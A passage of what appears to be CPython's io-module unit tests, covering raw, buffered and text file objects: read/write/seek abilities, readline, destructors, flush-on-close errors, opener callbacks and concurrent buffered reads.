(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2GB file and takes >2GB of disk space,
        # therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
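    # An illustrative sketch (an assumption, not the actual C or _pyio source): the
    # default RawIOBase.read() exercised above behaves roughly like this helper,
    # which is why MockRawIOWithoutRead only needs to provide readinto().
    @staticmethod
    def _read_via_readinto(raw, size):
        buf = bytearray(size)
        n = raw.readinto(buf)
        if n is None:
            return None  # the raw stream reported "no data currently available"
        return bytes(buf[:n])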
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
